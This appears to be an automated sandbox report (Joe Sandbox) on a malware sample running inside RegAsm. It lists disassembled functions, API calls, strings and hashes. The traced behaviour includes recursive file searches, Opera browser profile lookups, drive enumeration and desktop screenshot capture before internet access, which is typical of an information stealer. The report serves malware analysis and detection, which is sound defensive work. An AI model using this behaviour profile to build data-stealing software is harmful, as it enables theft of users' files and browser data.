                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                    • API String ID: 264515753-332874205
                                                                                    • Opcode ID: 6f8998cb08b0944052efbf8740fd338e57bd105e93cc6d3c4222f09e779521f7
                                                                                    • Instruction ID: 697dee4ec641feb1abd42be2dd66715ab0a5b9e69653565ecd0b7dc1d93a1252
                                                                                    • Opcode Fuzzy Hash: 6f8998cb08b0944052efbf8740fd338e57bd105e93cc6d3c4222f09e779521f7
                                                                                    • Instruction Fuzzy Hash: A4C170B1D0015DEEDF21EBE4DC45FDEBBBDAB08304F50406AF519A2191DB389A48CB65
                                                                                    Function 6C6C35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2637 6c6c35a0-6c6c35be 2638 6c6c38e9-6c6c38fb call 6c6fb320 2637->2638 2639 6c6c35c4-6c6c35ed InitializeCriticalSectionAndSpinCount getenv 2637->2639 2640 6c6c38fc-6c6c390c strcmp 2639->2640 2641 6c6c35f3-6c6c35f5 2639->2641 2640->2641 2645 6c6c3912-6c6c3922 strcmp 2640->2645 2643 6c6c35f8-6c6c3614 QueryPerformanceFrequency 2641->2643 2646 6c6c374f-6c6c3756 2643->2646 2647 6c6c361a-6c6c361c 2643->2647 2648 6c6c398a-6c6c398c 2645->2648 2649 6c6c3924-6c6c3932 2645->2649 2652 6c6c375c-6c6c3768 2646->2652 2653 6c6c396e-6c6c3982 2646->2653 2650 6c6c393d 2647->2650 2651 6c6c3622-6c6c364a _strnicmp 2647->2651 2648->2643 2649->2651 2654 6c6c3938 2649->2654 2655 6c6c3944-6c6c3957 _strnicmp 2650->2655 2651->2655 2656 6c6c3650-6c6c365e 2651->2656 2657 6c6c376a-6c6c37a1 QueryPerformanceCounter EnterCriticalSection 2652->2657 2653->2648 2654->2646 2655->2656 2658 6c6c395d-6c6c395f 2655->2658 2656->2658 2659 6c6c3664-6c6c36a9 GetSystemTimeAdjustment 2656->2659 2660 6c6c37b3-6c6c37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2657->2660 2661 6c6c37a3-6c6c37b1 2657->2661 2662 6c6c36af-6c6c3749 call 6c6fc110 2659->2662 2663 6c6c3964 2659->2663 2664 6c6c37fc-6c6c3839 LeaveCriticalSection 2660->2664 2665 6c6c37ed-6c6c37fa 2660->2665 2661->2660 2662->2646 2663->2653 2666 6c6c383b-6c6c3840 2664->2666 2667 6c6c3846-6c6c38ac call 6c6fc110 2664->2667 2665->2664 2666->2657 2666->2667 2672 6c6c38b2-6c6c38ca 2667->2672 2673 6c6c38cc-6c6c38db 2672->2673 2674 6c6c38dd-6c6c38e3 2672->2674 2673->2672 2673->2674 2674->2638
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74F688,00001000), ref: 6C6C35D5
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6C35E0
                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6C35FD
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6C363F
                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6C369F
                                                                                    • __aulldiv.LIBCMT ref: 6C6C36E4
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6C3773
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6C377E
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6C37BD
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6C37C4
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6C37CB
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6C3801
                                                                                    • __aulldiv.LIBCMT ref: 6C6C3883
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C6C3902
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C6C3918
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C6C394C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                    • API String ID: 301339242-3790311718
                                                                                    • Opcode ID: d2ccaa95ea3d1ab22d6f6abc5f027eaaadd443aa366ffc733a168da5d7ea793f
                                                                                    • Instruction ID: f1f672f258c776f1ca3ac7439a163f7c96d4881560667c5acbf955a1c295d118
                                                                                    • Opcode Fuzzy Hash: d2ccaa95ea3d1ab22d6f6abc5f027eaaadd443aa366ffc733a168da5d7ea793f
                                                                                    • Instruction Fuzzy Hash: 4BB1B271B093109BDB08EF28C94465ABBF9EB8A718F04C93FE899D7750D73099048B96
                                                                                    Function 004162AF Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004162B4
                                                                                    • wsprintfA.USER32 ref: 004162D4
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                    • StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                    • StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                    • wsprintfA.USER32 ref: 00416346
                                                                                    • StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                    • wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • wsprintfA.USER32 ref: 00416388
                                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                    • lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                    • lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                    • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                    • API String ID: 3254224521-445461498
                                                                                    • Opcode ID: c6dd6b3879fbe31c0c2597002abf9d8c351d85b94a33bf6f60126e16f2efa105
                                                                                    • Instruction ID: 716d461ee9032d4a9dae4af77dc79a1df6d5d6082356418533081d48ea1eca12
                                                                                    • Opcode Fuzzy Hash: c6dd6b3879fbe31c0c2597002abf9d8c351d85b94a33bf6f60126e16f2efa105
                                                                                    • Instruction Fuzzy Hash: 34919E71D0025DABDF11EBE4DD4ABDE7BB8AF09304F4040AAF505A3191DB389748CBA5
                                                                                    Function 004112FD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411302
                                                                                    • memset.MSVCRT ref: 00411328
                                                                                    • GetDesktopWindow.USER32 ref: 0041135E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                    • GetDC.USER32(00000000), ref: 00411372
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                    • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                    • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                      • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                    • DeleteObject.GDI32(?), ref: 004114B3
                                                                                    • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                    • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                    • String ID: image/jpeg
                                                                                    • API String ID: 3067874393-3785015651
                                                                                    • Opcode ID: 70786a0f146ffecec4e1b9b9cc4c00fb730120a767e4e931db604414e9c13406
                                                                                    • Instruction ID: e481ec1d7c30d31008a5a4d171f0d2eaa52fce57a9362255ea0698d6e4794ba3
                                                                                    • Opcode Fuzzy Hash: 70786a0f146ffecec4e1b9b9cc4c00fb730120a767e4e931db604414e9c13406
                                                                                    • Instruction Fuzzy Hash: A05118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
                                                                                    Function 00415AC2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415AC7
                                                                                    • wsprintfA.USER32 ref: 00415AEA
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                                    • StrCmpCA.SHLWAPI(?,004268D4), ref: 00415B23
                                                                                    • StrCmpCA.SHLWAPI(?,004268D8), ref: 00415B3D
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                                    • lstrcat.KERNEL32(?), ref: 00415B85
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                                    • lstrcat.KERNEL32(?,004268DC), ref: 00415BBB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                                    • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                    • String ID: %s\%s
                                                                                    • API String ID: 2282932919-4073750446
                                                                                    • Opcode ID: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                    • Instruction ID: 94379aee551275b5d998bba74236b2289a82a8dc712773d574ff1e2d259f5726
                                                                                    • Opcode Fuzzy Hash: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                    • Instruction Fuzzy Hash: 9E511D72900229ABDF11EBA1DD49EDE7B7CAF49304F0404AAE605E2151E7389789CBA5
                                                                                    Function 00409F72 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    • StrCmpCA.SHLWAPI(?,00425E68), ref: 0040A050
                                                                                    • StrCmpCA.SHLWAPI(?,00425E6C), ref: 0040A06A
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera,00425C13,00425C12,00425C0F,00425C0E,00425C0B,00425C0A,00425C07), ref: 0040A0FD
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                    • API String ID: 3869166975-536343317
                                                                                    • Opcode ID: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                    • Instruction ID: a17e2f684122670e3be7096712bbacc747ed706b0b8df0d6fbcd956b9d9e9cda
                                                                                    • Opcode Fuzzy Hash: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                    • Instruction Fuzzy Hash: 2C425B70904288EADF15EBE5C955BDDBBB46F29308F5040BEA409736C2DB781B4CCB66
                                                                                    Function 00415843 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415848
                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                    • memset.MSVCRT ref: 004158C9
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                                      • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                      • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                    • lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                    • API String ID: 2879972474-147700698
                                                                                    • Opcode ID: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                    • Instruction ID: 8fb32ebea5ed90456f7ca7ea911cfe9f81c0b13f291b8680dac0f4474b3225bb
                                                                                    • Opcode Fuzzy Hash: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                    • Instruction Fuzzy Hash: 395152B190025CEADF30AF61DC55EEE7B7DAF05344F50003ABA15A2191DB386A49CB59
                                                                                    Function 00401162 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 771fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
